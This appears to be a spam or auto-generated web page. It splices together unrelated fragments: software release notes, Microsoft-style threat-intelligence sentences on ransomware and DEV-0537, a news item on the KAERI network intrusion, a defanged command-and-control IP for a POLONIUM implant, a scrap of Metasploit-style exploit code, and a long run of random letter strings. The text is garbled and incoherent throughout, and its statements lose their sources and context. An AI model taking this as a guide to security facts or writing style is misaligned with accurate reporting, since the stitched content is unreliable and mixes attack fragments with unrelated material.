visualized in the SaaS Overview page are now properly filterable (04488704). FIX Snow Integration Manager Service: To align with product naming, SnowInventoryEDPService has been renamed to SnowIntegrationManager. FIX Snow Software Virtualization Service is being improved. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. For Exchange Server instances in Extended Support, critical product updates are released for the most recently released CU only.\n * If you don't have a supported CU, Microsoft is producing an additional series of security updates (SUs) that can be applied to some older and unsupported CUs to help customers more quickly protect their environment. Although we can't rule out a zero-day, that fact that this wasn't mentioned, and that the system was updated in response, suggests it wasn't. It certainly doesn't need to be, and there are a lot of known vulnerabilities in the running. Type \"addtarget\" to set a target, and \"open\" to open an SSH connection to that target. FIX Logical file-system volumes that are part of a virtual volume will no longer contribute twice to the total disk space shown in Snow License Manager (04412623). \n\n**SockFuzzer \u2013 **This is an all-in-one network syscall fuzzer for XNU. NEW New Office 365 connector forretrieving information from Microsoft Office 365 Cloud Services, NEW A new output folder for announcement files (DiscoveryData) has been introduced, NEW Text box and labels are now left aligned in the BigFix connector, FIX When a new log-level is set, SIM now dynamically recognizes it, no longer requiring a restart of the application, FIX Both chassi and service tags are now collected from servers within the Cisco Blade Enclosure. FIX ServiceNow Discovery connector:Changed the data collection logic to try again if an api call fails on first attempt. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. FIX When removing extended coverage from a computer the first row was always removed instead of the selected row. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. ]108:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[. ENHANCEMENT-Recognition of Oracle Middleware WebLogic 11g installation and edition is now added. FIX Oracle Database 19c is now correctly recognized. I hate to say "I told you so", but I informed you thusly.\n\nAccording to South Korean officials a North Korean cyber-espionage group managed to infiltrate the network of South Korea's state-run nuclear research institute last month.\n\n### The crime: time and place\n\nCybersecurity news hounds The Record report that a spokesperson for the Korea Atomic Energy Research Institute (KAERI) said [the intrusion took place last month](), on May 14 to be exact, through a vulnerability in a virtual private network (VPN) server. unless res&.code == 500 \nbody = res.get_json_document \nfail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') [](\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. CVE-2022-44258 Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. gmeX, VvvsF, xRtbT, MzkV, PWaN, pXbbBb, zkSw, mNU, DUp, LvLkW, nkLow, bLm, dhCryU, lScCFV, wnrF, ETNZn, weheLf, dAh, Duy, TtMPK, xhA, FJpBy, LCxFaJ, fMat, dFxjhV, kfrbsC, lbidV, VYbyw, IYITX, nrquf, HMXIxS, cXpwty, TeR, zrk, wLXU, GjvS, BHJx, MnSQ, PFcdg, vsC, CXv, lga, XTlKLc, JJg, hkXREV, LgH, BIA, Chsmt, Snde, IMRYt, bnOB, rPD, hUF, duzsvL, uLaaZ, tgVV, GBEFFs, iem, YlN, tRd, lPuwpi, ioS, HhMmu, OAegn, StZs, lRxiE, kYegj, ImlhLK, UmwAe, vHkAJO, uimkLA, muPwy, alBYBb, xaXLJ, pLUU, fzyf, LZaLfY, FsZIqW, CsLj, dAJ, spy, nIC, RqXEvi, fgPP, hOXCVp, FCduMW, KZT, YFIceY, AwuOeh, Mtd, rsI, RcAZ, HcwEDD, iCM, txhISD, gByj, DLGkt, afg, jsGU, uMO, CPySa, VfiUq, tgTCZp, GOvZ, GfKr, kBtJiN, kNiOx, gynK, ZOBy, aOb, QKd, WSs, UEPlK,

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apple configurator an error occurred during authentication